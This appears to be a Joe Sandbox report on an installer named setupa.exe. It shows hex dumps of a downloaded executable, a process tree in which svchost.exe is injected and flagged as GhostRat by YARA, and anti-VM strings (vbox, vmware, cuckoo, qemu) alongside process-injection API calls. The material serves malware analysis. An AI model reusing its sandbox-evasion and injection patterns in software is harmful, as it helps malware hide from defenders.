                                                                                                            Data Ascii: MZ+;|1tdJ}3^jY+0AM4A]@uMUY uM_[U,EHSMHMH?WMEu'339\u@|33}jXeVu}5DANN
                                                                                                            2024-10-07 04:39:07 UTC16384INData Raw: 10 00 10 00 10 00 10 00 14 00 14 00 10 00 10 00 10 00 10 00 10 00 14 00 10 00 10 00 10 00 10 00 10 00 10 00 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 10 00 01 01 01 01 01 01 01 01 01 01 01 01 01 01 02 01 02 01 02 01 02 01 02 01 02 01 02 01 02 01 02 01 02 01 02 01 02 01 02 01 02 01 02 01 02 01 02 01 02 01 02 01 02 01 02 01 02 01 02 01 02 01 10 00 02 01 02 01 02 01 02 01 02 01 02 01 02 01 02 01 01 01 00 00 00 00 80 81 82 83 84 85 86 87 88 89 8a 8b 8c 8d 8e 8f 90 91 92 93 94 95 96 97 98 99 9a 9b 9c 9d 9e 9f a0 a1 a2 a3 a4 a5 a6 a7 a8 a9 aa ab ac ad ae af b0 b1 b2 b3 b4 b5 b6 b7 b8 b9 ba bb bc bd be bf c0 c1 c2 c3 c4 c5 c6 c7 c8 c9 ca cb cc cd ce cf d0 d1 d2 d3 d4
                                                                                                            Data Ascii:
                                                                                                            2024-10-07 04:39:07 UTC16384INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 00 00 00 00 01 00 00 00 00 00 00 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 65 9d 40 00 00 00 00 00 02 00 00 00 10 47 41 00 08 00 00 00 e4 46 41 00 09 00 00 00 b8 46 41 00 0a 00 00 00 20 46 41 00 10 00 00 00 f4 45 41 00 11 00 00 00 c4 45 41 00 12 00 00 00 a0 45 41 00 13 00 00 00 74 45 41 00 18 00 00 00 3c 45 41 00 19 00 00 00 14
                                                                                                            Data Ascii: e@GAFAFA FAEAEAEAtEA<EA
                                                                                                            2024-10-07 04:39:07 UTC16384INData Raw: d1 47 4b 63 61 64 58 0c 11 00 fc fe 27 3b 73 53 9e 4b 43 c3 cb 88 1d 65 a0 18 21 00 b4 fe de d9 4c 2a c4 ea 46 1e 0d af 03 e5 c0 c3 a6 32 5a ed f9 6a c0 18 20 00 1c f8 6b ea 12 dd d5 82 2b eb b0 35 34 bc 00 94 0f 63 66 e0 b8 85 ec b2 39 14 de 83 c7 09 00 7e 7f bb 2a 44 0f b4 73 26 f5 07 9f 0d 2d a1 50 8d 41 3a 07 4a 31 88 ea 9e cf 92 1d 86 f8 7b 3c 13 7a c2 a1 1d 08 cb 04 dd 61 68 52 02 51 45 53 d4 52 23 67 60 1d b0 46 58 13 a8 29 63 b0 07 26 3d 5d b8 72 8d 92 64 f7 a8 5b 6b 04 45 aa 7f cc 66 34 7f a7 97 e7 44 7a 9c 00 6a 5e 45 f4 68 47 4e b5 cb d8 d7 cd 87 4d 03 5f 0d 2a b2 9b 0e 4b 25 e1 dd c7 89 8e 9f 93 62 22 99 d9 36 16 16 12 cd 20 01 12 48 f6 6f b2 12 05 89 2a 15 23 aa 56 8a a8 86 78 e6 4a c5 c5 c6 cb 17 7d 05 e1 44 05 14 93 51 63 bf ed 88 58 23 f1
                                                                                                            Data Ascii: GKcadX';sSKCe!L*F2Zj k+54cf9~*Ds&-PA:J1{<zahRQESR#g`FX)c&=]rd[kEf4Dzj^EhGNM_*K%b"6 Ho*#VxJ}DQcX#
                                                                                                            2024-10-07 04:39:07 UTC16384INData Raw: 43 ff fe da bb ff fe fe fe ff fe fe fe ff fe fe fe ff fe fe fe ff fe fe fe ff fe fe fe ff fe fe fe ff fe fe fe ff fe fe fe ff fe fe fe ff fe fe fe ff fe fe fe ff fe fe fe ff fe fe fe ff fe fe fe ff fe fe fe ff fe fe fe ff fe fe fe ff fe fe fe ff fe fe fe ff fe fe fe ff fe fe fe ff fe e5 d0 ff ff 9d 4a ff ff 98 41 ff fe d2 ad ff fe fe fe ff fe fe fe ff fe fe fe ff fe fe fe ff fe fe fe ff fe fe fe ff fe e9 d7 ff ff a6 5b ff ff 97 3f ff ff 97 3f ff ff 97 3f ff ff 97 3f ff ff 97 3f ff ff 97 3f ff ff 97 3f ff ff 97 3f ff fe 96 3e df fe 97 3e e0 ff 97 3f ff ff 97 3f ff ff 97 3f ff ff 97 3f ff ff 97 3f ff ff 97 3f ff ff 97 3f ff ff 9b 47 ff fe d6 b4 ff fe fd fc ff fe fe fe ff fe fe fe ff fe fe fe ff fe fe fe ff fe fe fe ff fe fe fe ff fe f1 e5 ff ff a5 59 ff ff
                                                                                                            Data Ascii: CJA[????????>>???????GY
                                                                                                            2024-10-07 04:39:07 UTC16384INData Raw: 45 ff ff 98 41 ff ff 97 3f ff ff 97 3f ff ff 97 3f ff ff 97 3f ff fe 97 3f de fe 96 3e df ff 97 3f ff ff 97 3f ff ff 97 3f ff ff 98 40 ff ff b4 76 ff ff 9b 46 ff ff b8 7d ff fe fb f8 ff fe fe fe ff fe fe fe ff fe fe fe ff fe fe fe ff fe fe fe ff ff cb 9f ff ff 98 41 ff fe d4 b0 ff fe fe fe ff fe fe fe ff fe fe fe ff fe fe fe ff fe fe fe ff fe fe fe ff fe fe fe ff fe fe fe ff fe fe fe ff fe fe fe ff fe fe fe ff fe fe fe ff fe fe fe ff fe fe fe ff fe dc bf ff ff 99 43 ff ff c3 90 ff fe fd fd ff fe fe fe ff fe fe fe ff fe fe fe ff fe fe fe ff fe fc fb ff ff c1 8c ff ff 99 43 ff ff ae 69 ff ff 98 41 ff ff 97 3f ff ff 97 3f ff ff 97 3f ff fe 97 3f de fe 96 3e df ff 97 3f ff ff 97 3f ff ff 97 3f ff ff 99 43 ff fe d1 ab ff ff a9 60 ff ff a2 54 ff fe ed de ff fe
                                                                                                            Data Ascii: EA?????>???@vF}ACCiA????>???C`T


                                                                                                            Target ID:0
                                                                                                            Start time:00:39:00
                                                                                                            Start date:07/10/2024
                                                                                                            Path:C:\Users\user\Desktop\setupa.exe
                                                                                                            Wow64 process (32bit):false
                                                                                                            Commandline:"C:\Users\user\Desktop\setupa.exe"
                                                                                                            Imagebase:0x7ff689640000
                                                                                                            File size:1'695'232 bytes
                                                                                                            MD5 hash:60CAFF11E037BAC89BDB4DD789D65FD7
                                                                                                            Has elevated privileges:true
                                                                                                            Has administrator privileges:true
                                                                                                            Programmed in:C, C++ or other language
                                                                                                            Reputation:low
                                                                                                            Has exited:true

                                                                                                            Target ID:1
                                                                                                            Start time:00:39:00
                                                                                                            Start date:07/10/2024
                                                                                                            Path:C:\Windows\System32\lsass.exe
                                                                                                            Wow64 process (32bit):false
                                                                                                            Commandline:C:\Windows\system32\lsass.exe
                                                                                                            Imagebase:0x7ff654c90000
                                                                                                            File size:59'456 bytes
                                                                                                            MD5 hash:A1CC00332BBF370654EE3DC8CDC8C95A
                                                                                                            Has elevated privileges:true
                                                                                                            Has administrator privileges:true
                                                                                                            Programmed in:C, C++ or other language
                                                                                                            Reputation:moderate
                                                                                                            Has exited:false

                                                                                                            Target ID:2
                                                                                                            Start time:00:39:00
                                                                                                            Start date:07/10/2024
                                                                                                            Path:C:\Windows\System32\dllhost.exe
                                                                                                            Wow64 process (32bit):false
                                                                                                            Commandline:C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}
                                                                                                            Imagebase:0x7ff669820000
                                                                                                            File size:21'312 bytes
                                                                                                            MD5 hash:08EB78E5BE019DF044C26B14703BD1FA
                                                                                                            Has elevated privileges:false
                                                                                                            Has administrator privileges:false
                                                                                                            Programmed in:C, C++ or other language
                                                                                                            Reputation:moderate
                                                                                                            Has exited:true

                                                                                                            Target ID:3
                                                                                                            Start time:00:39:07
                                                                                                            Start date:07/10/2024
                                                                                                            Path:C:\Program Files\upupoo-classicshell.exe
                                                                                                            Wow64 process (32bit):true
                                                                                                            Commandline:"C:\Program Files\upupoo-classicshell.exe"
                                                                                                            Imagebase:0xc20000
                                                                                                            File size:198'920 bytes
                                                                                                            MD5 hash:606CDA46E88CE86AE85AC92B2B560D0A
                                                                                                            Has elevated privileges:true
                                                                                                            Has administrator privileges:true
                                                                                                            Programmed in:C, C++ or other language
                                                                                                            Antivirus matches:
                                                                                                            • Detection: 0%, ReversingLabs
                                                                                                            Reputation:low
                                                                                                            Has exited:true

                                                                                                            Target ID:4
                                                                                                            Start time:00:39:08
                                                                                                            Start date:07/10/2024
                                                                                                            Path:C:\Windows\SysWOW64\svchost.exe
                                                                                                            Wow64 process (32bit):true
                                                                                                            Commandline:svchost.exe
                                                                                                            Imagebase:0x420000
                                                                                                            File size:46'504 bytes
                                                                                                            MD5 hash:1ED18311E3DA35942DB37D15FA40CC5B
                                                                                                            Has elevated privileges:true
                                                                                                            Has administrator privileges:true
                                                                                                            Programmed in:C, C++ or other language
                                                                                                            Yara matches:
                                                                                                            • Rule: JoeSecurity_GhostRat, Description: Yara detected GhostRat, Source: 00000004.00000002.3350782055.0000000004DF0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                            • Rule: JoeSecurity_GhostRat, Description: Yara detected GhostRat, Source: 00000004.00000003.3043302904.00000000028A2000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                            • Rule: JoeSecurity_GhostRat, Description: Yara detected GhostRat, Source: 00000004.00000003.2246719024.000000000283B000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                            • Rule: JoeSecurity_GhostRat, Description: Yara detected GhostRat, Source: 00000004.00000002.3347088080.0000000004584000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                            • Rule: JoeSecurity_GhostRat, Description: Yara detected GhostRat, Source: 00000004.00000002.3354222266.0000000006700000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                            • Rule: JoeSecurity_GhostRat, Description: Yara detected GhostRat, Source: 00000004.00000003.3292327565.00000000028A2000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                            • Rule: JoeSecurity_GhostRat, Description: Yara detected GhostRat, Source: 00000004.00000003.2246797998.000000000286D000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                            • Rule: JoeSecurity_GhostRat, Description: Yara detected GhostRat, Source: 00000004.00000003.3043504278.00000000028A2000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                            • Rule: JoeSecurity_GhostRat, Description: Yara detected GhostRat, Source: 00000004.00000003.3043302904.0000000002870000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                            • Rule: JoeSecurity_GhostRat, Description: Yara detected GhostRat, Source: 00000004.00000003.2246719024.000000000286D000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                            • Rule: JoeSecurity_GhostRat, Description: Yara detected GhostRat, Source: 00000004.00000002.3349974011.0000000004C70000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                            • Rule: JoeSecurity_GhostRat, Description: Yara detected GhostRat, Source: 00000004.00000002.3348722522.0000000004BD0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                            • Rule: JoeSecurity_GhostRat, Description: Yara detected GhostRat, Source: 00000004.00000003.3292327565.0000000002870000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                            • Rule: JoeSecurity_GhostRat, Description: Yara detected GhostRat, Source: 00000004.00000003.2246842041.0000000004552000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                            • Rule: JoeSecurity_GhostRat, Description: Yara detected GhostRat, Source: 00000004.00000002.3354222266.0000000006733000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                            • Rule: JoeSecurity_GhostRat, Description: Yara detected GhostRat, Source: 00000004.00000003.3292521835.00000000028A2000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                            • Rule: JoeSecurity_GhostRat, Description: Yara detected GhostRat, Source: 00000004.00000003.2235102743.0000000004452000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                            • Rule: JoeSecurity_GhostRat, Description: Yara detected GhostRat, Source: 00000004.00000003.3292583935.0000000004512000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                            • Rule: JoeSecurity_GhostRat, Description: Yara detected GhostRat, Source: 00000004.00000003.2246842041.0000000004584000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                            • Rule: JoeSecurity_GhostRat, Description: Yara detected GhostRat, Source: 00000004.00000003.3043573393.0000000004512000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                            Reputation:high
                                                                                                            Has exited:false

                                                                                                            Target ID:7
                                                                                                            Start time:00:39:09
                                                                                                            Start date:07/10/2024
                                                                                                            Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                                            Wow64 process (32bit):true
                                                                                                            Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 5696 -s 480
                                                                                                            Imagebase:0x880000
                                                                                                            File size:483'680 bytes
                                                                                                            MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                                                                            Has elevated privileges:true
                                                                                                            Has administrator privileges:true
                                                                                                            Programmed in:C, C++ or other language
                                                                                                            Reputation:high
                                                                                                            Has exited:true

                                                                                                            Target ID:8
                                                                                                            Start time:00:39:11
                                                                                                            Start date:07/10/2024
                                                                                                            Path:C:\Windows\System32\svchost.exe
                                                                                                            Wow64 process (32bit):false
                                                                                                            Commandline:C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc
                                                                                                            Imagebase:0x7ff7e52b0000
                                                                                                            File size:55'320 bytes
                                                                                                            MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                            Has elevated privileges:true
                                                                                                            Has administrator privileges:true
                                                                                                            Programmed in:C, C++ or other language
                                                                                                            Reputation:high
                                                                                                            Has exited:false

                                                                                                            Target ID:9
                                                                                                            Start time:00:39:13
                                                                                                            Start date:07/10/2024
                                                                                                            Path:C:\Windows\System32\svchost.exe
                                                                                                            Wow64 process (32bit):false
                                                                                                            Commandline:C:\Windows\system32\svchost.exe -k NetworkService -p -s CryptSvc
                                                                                                            Imagebase:0x7ff7e52b0000
                                                                                                            File size:55'320 bytes
                                                                                                            MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                            Has elevated privileges:true
                                                                                                            Has administrator privileges:false
                                                                                                            Programmed in:C, C++ or other language
                                                                                                            Reputation:high
                                                                                                            Has exited:false

                                                                                                            Target ID:11
                                                                                                            Start time:00:39:16
                                                                                                            Start date:07/10/2024
                                                                                                            Path:C:\Users\Public\Documents\upupoo-classicshell.exe
                                                                                                            Wow64 process (32bit):true
                                                                                                            Commandline:"C:\Users\Public\Documents\upupoo-classicshell.exe"
                                                                                                            Imagebase:0xc20000
                                                                                                            File size:198'920 bytes
                                                                                                            MD5 hash:606CDA46E88CE86AE85AC92B2B560D0A
                                                                                                            Has elevated privileges:false
                                                                                                            Has administrator privileges:false
                                                                                                            Programmed in:C, C++ or other language
                                                                                                            Reputation:low
                                                                                                            Has exited:true

                                                                                                            Target ID:12
                                                                                                            Start time:00:39:17
                                                                                                            Start date:07/10/2024
                                                                                                            Path:C:\Windows\SysWOW64\svchost.exe
                                                                                                            Wow64 process (32bit):true
                                                                                                            Commandline:svchost.exe
                                                                                                            Imagebase:0x420000
                                                                                                            File size:46'504 bytes
                                                                                                            MD5 hash:1ED18311E3DA35942DB37D15FA40CC5B
                                                                                                            Has elevated privileges:false
                                                                                                            Has administrator privileges:false
                                                                                                            Programmed in:C, C++ or other language
                                                                                                            Yara matches:
                                                                                                            • Rule: JoeSecurity_GhostRat, Description: Yara detected GhostRat, Source: 0000000C.00000003.2318618858.0000000002C6B000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                            • Rule: JoeSecurity_GhostRat, Description: Yara detected GhostRat, Source: 0000000C.00000002.3346097174.0000000004852000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                            • Rule: JoeSecurity_GhostRat, Description: Yara detected GhostRat, Source: 0000000C.00000003.2318479368.0000000002C6B000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                            • Rule: JoeSecurity_GhostRat, Description: Yara detected GhostRat, Source: 0000000C.00000003.2318739703.0000000004984000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                            • Rule: JoeSecurity_GhostRat, Description: Yara detected GhostRat, Source: 0000000C.00000003.2318479368.0000000002C39000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                            • Rule: JoeSecurity_GhostRat, Description: Yara detected GhostRat, Source: 0000000C.00000002.3349931132.00000000052B0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                            • Rule: JoeSecurity_GhostRat, Description: Yara detected GhostRat, Source: 0000000C.00000003.2318739703.0000000004912000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                            • Rule: JoeSecurity_GhostRat, Description: Yara detected GhostRat, Source: 0000000C.00000003.2338206272.0000000004852000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                            • Rule: JoeSecurity_GhostRat, Description: Yara detected GhostRat, Source: 0000000C.00000002.3347172652.0000000004984000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                            • Rule: JoeSecurity_GhostRat, Description: Yara detected GhostRat, Source: 0000000C.00000002.3349260884.0000000005130000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                            • Rule: JoeSecurity_GhostRat, Description: Yara detected GhostRat, Source: 0000000C.00000003.2308042453.0000000002C32000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                            Reputation:high
                                                                                                            Has exited:false

                                                                                                            Target ID:14
                                                                                                            Start time:00:39:19
                                                                                                            Start date:07/10/2024
                                                                                                            Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                                            Wow64 process (32bit):true
                                                                                                            Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 1308 -s 488
                                                                                                            Imagebase:0x880000
                                                                                                            File size:483'680 bytes
                                                                                                            MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                                                                            Has elevated privileges:false
                                                                                                            Has administrator privileges:false
                                                                                                            Programmed in:C, C++ or other language
                                                                                                            Reputation:high
                                                                                                            Has exited:true


                                                                                                              Execution Graph

                                                                                                              Execution Coverage:1.8%
                                                                                                              Dynamic/Decrypted Code Coverage:0%
                                                                                                              Signature Coverage:47.5%
                                                                                                              Total number of Nodes:179
                                                                                                              Total number of Limit Nodes:15
                                                                                                              Execution graph node data (serialized node ids and edges of the interactive graph viewer) omitted. Windows API calls that appear as graph nodes: WideCharToMultiByte, NtQueryInformationProcess, RtlNtStatusToDosError, DuplicateHandle, VirtualAllocEx, WriteProcessMemory, SetInformationJobObject, AssignProcessToJobObject, GetCurrentProcess, CloseHandle, ShellExecuteEx, LoadLibraryA, LoadLibraryW, GetProcAddress, GetLocaleInfoW, GetLocaleInfoEx, GetComputerNameA, GetSystemInfo, GetLogicalDriveStringsA, GlobalMemoryStatusEx, GetAdaptersInfo, IsDebuggerPresent, GetModuleHandleA, FindResourceA, LoadResource, SizeofResource, LockResource, GetModuleFileNameA, MessageBoxW, Sleep.

                                                                                                              Control-flow Graph

                                                                                                              Control-flow graph (legend: Executed / Not Executed) for the function starting at 7ff689642cde; basic-block and edge data of the interactive viewer omitted. API calls on its blocks: LoadLibraryA (2 calls), GetProcAddress (5 calls), GetComputerNameA, GetSystemInfo, GetLogicalDriveStringsA, GlobalMemoryStatusEx, GetAdaptersInfo (two call sites).
                                                                                                              APIs
                                                                                                              Strings
                                                                                                              Memory Dump Source
• Source File: 00000000.00000002.2203109760.00007FF689641000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF689640000, based on PE: true
• Associated: 00000000.00000002.2203090868.00007FF689640000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000000.00000002.2203109760.00007FF689652000.00000020.00000001.01000000.0000000A.sdmp
• Associated: 00000000.00000002.2203109760.00007FF689743000.00000020.00000001.01000000.0000000A.sdmp
• Associated: 00000000.00000002.2203109760.00007FF68974A000.00000020.00000001.01000000.0000000A.sdmp
• Associated: 00000000.00000002.2203305645.00007FF68974C000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000000.00000002.2203377522.00007FF689790000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000000.00000002.2203398565.00007FF689792000.00000008.00000001.01000000.0000000A.sdmp
• Associated: 00000000.00000002.2203419693.00007FF689795000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000000.00000002.2203442361.00007FF689799000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000000.00000002.2203442361.00007FF6897A8000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000000.00000002.2203493937.00007FF6897AC000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000000.00000002.2203493937.00007FF6897E4000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_7ff689640000_setupa.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: Library$Free$AddressProc$Info$AdaptersLoad$ComputerDriveGlobalLogicalMemoryNameStatusStringsSystem
                                                                                                              • String ID: .dll$.dll$GetS$avasvbox$avg$bitdoxvirttvboxvirtsandmalwvmwacuckavasvbox$cuckavasvbox$der$el32$gsA$ice$iphl$kern$mInf$malwvmwacuckavasvbox$papi$qemu$re$serv$trin$ual$usEx$vbox$vbox$vboxvirtsandmalwvmwacuckavasvbox$virttvboxvirtsandmalwvmwacuckavasvbox$yste
                                                                                                              • API String ID: 521130867-3252873104
                                                                                                              • Opcode ID: 3b89a149c47e2ab1268961066b91b0b10c5194608dd43912f8c2b265ce9dc320
                                                                                                              • Instruction ID: 84ab1c9fc9fe3dbceda070cc8f8ee60edb51183378a844831e9222fadba18029
                                                                                                              • Opcode Fuzzy Hash: 3b89a149c47e2ab1268961066b91b0b10c5194608dd43912f8c2b265ce9dc320
                                                                                                              • Instruction Fuzzy Hash: 3AE17132A09781DAE721CF61E8402ED37A0FF55B99F504239DA4D5BB58EF38D685CB00

                                                                                                              Control-flow Graph

                                                                                                              APIs
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2203109760.00007FF689641000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF689640000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_7ff689640000_setupa.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: AddressProcResource$HandleModule$FindLoadLockSizeof
                                                                                                              • String ID: GetPddre$LoadaryAGetPddre$MoveAkern.dllLoadaryAGetPddre$ddre$eA$kern.dllLoadaryAGetPddre$ss
                                                                                                              • API String ID: 3384031397-1216065373
                                                                                                              • Opcode ID: 2b9afb961e81307596f16013bcdb1345da380b4477b8ad138d7866a2b3849765
                                                                                                              • Instruction ID: 95b1094d3784b04f83c715663c2461afdce449a4f8e4c4acd2fb66040b08d2b2
                                                                                                              • Opcode Fuzzy Hash: 2b9afb961e81307596f16013bcdb1345da380b4477b8ad138d7866a2b3849765
                                                                                                              • Instruction Fuzzy Hash: FF513465A09A92CAFB048FA1E8143A832A0BF44BCAF54403DCE4D9AB59DF7CD544CB04

                                                                                                              Control-flow Graph

                                                                                                              APIs
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2203109760.00007FF689641000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF689640000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_7ff689640000_setupa.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: AddressLibraryProc$Free$Load
                                                                                                              • String ID: Coun$Freq$GetT$ickC$ount$ter$uenc
                                                                                                              • API String ID: 3262421712-2732439934
                                                                                                              • Opcode ID: 2c33b76a8132c095a3d2536de20ecc734e02814c7917a0aaabf729632f2b899f
                                                                                                              • Instruction ID: 8c3482f787ee74ccd70251b1b7cbbab882d88141a07db310864d59e9e71256f9
                                                                                                              • Opcode Fuzzy Hash: 2c33b76a8132c095a3d2536de20ecc734e02814c7917a0aaabf729632f2b899f
                                                                                                              • Instruction Fuzzy Hash: 30517932B09A42CEFB12DFB5D0402AC67A1BF55BC9F054139DE0D66A58EF78E18AC700

                                                                                                              Control-flow Graph

                                                                                                              APIs
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2203109760.00007FF689652000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF689640000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_7ff689640000_setupa.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: ByteCharMultiWide$InformationTimeZone
                                                                                                              • String ID: -$:$:$?$Eastern Standard Time$Eastern Summer Time
                                                                                                              • API String ID: 1904278450-2354618740
                                                                                                              • Opcode ID: 82ba0ddb89d93bf66aa19cef63e2ca7a811afcc756a40b34f9db031fedace250
                                                                                                              • Instruction ID: d61eabb52506a48834a53196347bb2d8f24264570483770d94903cefd81af5f5
                                                                                                              • Opcode Fuzzy Hash: 82ba0ddb89d93bf66aa19cef63e2ca7a811afcc756a40b34f9db031fedace250
                                                                                                              • Instruction Fuzzy Hash: 41E1D232A18682CAF7609F7599515A93B92FF88FC5F44113DEA4EC2A95DF3CE481CB00

                                                                                                              Control-flow Graph

                                                                                                              APIs
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2203109760.00007FF689641000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF689640000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_7ff689640000_setupa.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: ErrorInformationProcessQueryStatus
                                                                                                              • String ID:
                                                                                                              • API String ID: 712673026-0
                                                                                                              • Opcode ID: 3ed113cdca4e8b60ae5bb97ce9939c181b4c4b98c75fe3b7dc5bb1bbb060d088
                                                                                                              • Instruction ID: 18b122ba0bc7d77710df1cc4a3e3ac5f7d4d310368fc6fd9f9945c998d1a1ace
                                                                                                              • Opcode Fuzzy Hash: 3ed113cdca4e8b60ae5bb97ce9939c181b4c4b98c75fe3b7dc5bb1bbb060d088
                                                                                                              • Instruction Fuzzy Hash: B021A122B0564289FB20EF61D4507ED27A0BF45BE9F004238DE1D97796DE38E485C740
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2203109760.00007FF689641000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF689640000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_7ff689640000_setupa.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: cfcc3d223c2ca2153cf332cbcdc9e480dd5cff7cae649d9e46a30e94375ee156
                                                                                                              • Instruction ID: a9022a723c02e1777f4f4fc06b1859a42c2c468db3fb30580d0520b1d5ecf023
                                                                                                              • Opcode Fuzzy Hash: cfcc3d223c2ca2153cf332cbcdc9e480dd5cff7cae649d9e46a30e94375ee156
                                                                                                              • Instruction Fuzzy Hash: 07827B61E49A63C5FA959F6598A06B822A0FF45FC2B14403EED4EE37A5DE3CA4C1D340

                                                                                                              Control-flow Graph

                                                                                                              APIs
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2203109760.00007FF689641000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF689640000, based on PE: true
                                                                                                               • Associated: 00000000.00000002.2203090868.00007FF689640000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                               • Associated: 00000000.00000002.2203109760.00007FF689652000.00000020.00000001.01000000.0000000A.sdmp
                                                                                                               • Associated: 00000000.00000002.2203109760.00007FF689743000.00000020.00000001.01000000.0000000A.sdmp
                                                                                                               • Associated: 00000000.00000002.2203109760.00007FF68974A000.00000020.00000001.01000000.0000000A.sdmp
                                                                                                               • Associated: 00000000.00000002.2203305645.00007FF68974C000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                               • Associated: 00000000.00000002.2203377522.00007FF689790000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                               • Associated: 00000000.00000002.2203398565.00007FF689792000.00000008.00000001.01000000.0000000A.sdmp
                                                                                                               • Associated: 00000000.00000002.2203419693.00007FF689795000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                               • Associated: 00000000.00000002.2203442361.00007FF689799000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                               • Associated: 00000000.00000002.2203442361.00007FF6897A8000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                               • Associated: 00000000.00000002.2203493937.00007FF6897AC000.00000002.00000001.01000000.0000000A.sdmp
